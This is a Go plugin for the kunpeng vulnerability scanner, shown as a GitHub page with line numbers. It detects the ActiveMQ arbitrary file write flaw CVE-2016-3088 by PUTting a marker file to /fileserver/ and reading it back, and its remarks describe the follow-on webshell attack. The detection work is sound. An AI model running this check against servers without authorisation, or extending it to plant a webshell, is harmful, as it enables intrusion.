/
activemqUpload.go
65 lines (61 loc) · 1.56 KB
/
activemqUpload.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
package goplugin
import (
"net/http"
"strings"
"github.com/opensec-cn/kunpeng/plugin"
"github.com/opensec-cn/kunpeng/util"
)
type activemqUpload struct {
info plugin.Plugin
result []plugin.Plugin
}
func init() {
plugin.Regist("activemq", &activemqUpload{})
}
func (d *activemqUpload) Init() plugin.Plugin {
d.info = plugin.Plugin{
Name: "ActiveMQ 任意文件写入漏洞",
Remarks: "通过PUT请求,攻击者可上传文件到web目录,再通过MOVE得到webshell,导致服务器被入侵控制。",
Level: 0,
Type: "UPLOAD",
Author: "wolf",
References: plugin.References{
URL: "https://github.com/vulhub/vulhub/tree/master/activemq/CVE-2016-3088",
CVE: "CVE-2016-3088",
KPID: "KP-0033",
},
}
return d.info
}
func (d *activemqUpload) GetResult() []plugin.Plugin {
var result = d.result
d.result = []plugin.Plugin{}
return result
}
func (d *activemqUpload) Check(URL string, meta plugin.TaskMeta) bool {
putURL := URL + "/fileserver/" + util.GetRandomString(6) + ".txt"
request, err := http.NewRequest("PUT", putURL, strings.NewReader("vultest"))
if err != nil {
return false
}
_, err = util.RequestDo(request, false)
if err != nil {
return false
}
vRequest, err := http.NewRequest("GET", putURL, nil)
if err != nil {
return false
}
resp, err := util.RequestDo(vRequest, true)
if err != nil {
return false
}
if strings.Contains(resp.ResponseRaw, "vultest") {
result := d.info
result.Response = resp.ResponseRaw
result.Request = resp.RequestRaw
d.result = append(d.result, result)
return true
}
return false
}